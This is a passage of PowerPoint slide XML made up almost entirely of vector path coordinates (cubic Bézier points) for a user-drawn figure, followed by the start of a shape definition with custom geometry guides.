                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="49" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="205"/>
                      <a:pt x="38" y="203"/>
                      <a:pt x="33" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="200"/>
                      <a:pt x="19" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="4" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="3" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="8" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="23" y="155"/>
                      <a:pt x="23" y="150"/>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4"/>
                      <a:pt x="5" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="7" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="176"/>
                      <a:pt x="9" y="179"/>
                      <a:pt x="7" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="5" y="191"/>
                      <a:pt x="7" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="14" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="46" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="56" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="65" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="63" y="182"/>
                      <a:pt x="61" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="43" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="38" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="143"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="140"/>
                      <a:pt x="25" y="137"/>
                      <a:pt x="26" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="40" y="99"/>
                      <a:pt x="44" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="61" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="38"/>
                      <a:pt x="59" y="33"/>
                      <a:pt x="59" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="16"/>
                      <a:pt x="64" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="103" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="118" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="123" y="29"/>
                      <a:pt x="123" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="123" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="61"/>
                      <a:pt x="129" y="74"/>
                      <a:pt x="139" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="160" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="158" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="148"/>
                      <a:pt x="154" y="150"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="150" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="160"/>
                      <a:pt x="140" y="160"/>
                      <a:pt x="136" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="149"/>
                      <a:pt x="127" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="122" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="171"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="189"/>
                      <a:pt x="122" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="137" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="166" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="177" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="173" y="174"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="75" y="73"/>
                      <a:pt x="78" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="89" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="70"/>
                      <a:pt x="95" y="68"/>
                      <a:pt x="98" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="67"/>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="74" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="70" y="74"/>
                      <a:pt x="68" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="66" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="73"/>
                      <a:pt x="65" y="75"/>
                      <a:pt x="64" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="62" y="81"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="58" y="89"/>
                      <a:pt x="58" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="59"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6"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8" y="121"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="127"/>
                      <a:pt x="36" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="138"/>
                      <a:pt x="38" y="140"/>
                      <a:pt x="40" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="149"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="70" y="169"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="175"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="65" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="63" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="180"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="188"/>
                      <a:pt x="70" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="73" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="71" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="183"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="69" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="77" y="185"/>
                      <a:pt x="79" y="186"/>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3"/>
                      <a:pt x="117" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="116" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="117" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="178"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="120" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="119" y="163"/>
                      <a:pt x="118" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="156"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="120" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="147"/>
                      <a:pt x="123" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="127" y="146"/>
                      <a:pt x="127" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="133" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="127" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>
                      <a:pt x="137" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="117"/>
                      <a:pt x="140" y="123"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="129" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="133"/>
                      <a:pt x="128" y="131"/>
                      <a:pt x="128" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="121"/>
                      <a:pt x="127" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="118" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="113" y="79"/>
                      <a:pt x="108" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="107" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="56"/>
                      <a:pt x="107" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="52"/>
                      <a:pt x="98" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="48"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="92" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="104" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="102" y="49"/>
                      <a:pt x="103" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="108" y="39"/>
                      <a:pt x="106" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="77" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="71" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="64" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="50"/>
                      <a:pt x="68" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="70" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="66" y="42"/>
                      <a:pt x="67" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="46"/>
                      <a:pt x="75" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="49"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="67" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="99" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="58"/>
                      <a:pt x="104" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="87" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="75" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="41"/>
                      <a:pt x="71" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="100" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="101" y="40"/>
                      <a:pt x="100"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301"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6802" y="789"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 1 h 2"/>
                  <a:gd name="T4" fmla="*/ 0 w 3"/>
                  <a:gd name="T5" fmla="*/ 2 h 2"/>
                  <a:gd name="T6" fmla="*/ 1 w 3"/>
                  <a:gd name="T7" fmla="*/ 1 h 2"/>
                  <a:gd name="T8" fmla="*/ 2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cubicBezTo>
                      <a:pt x="2" y="0"/>
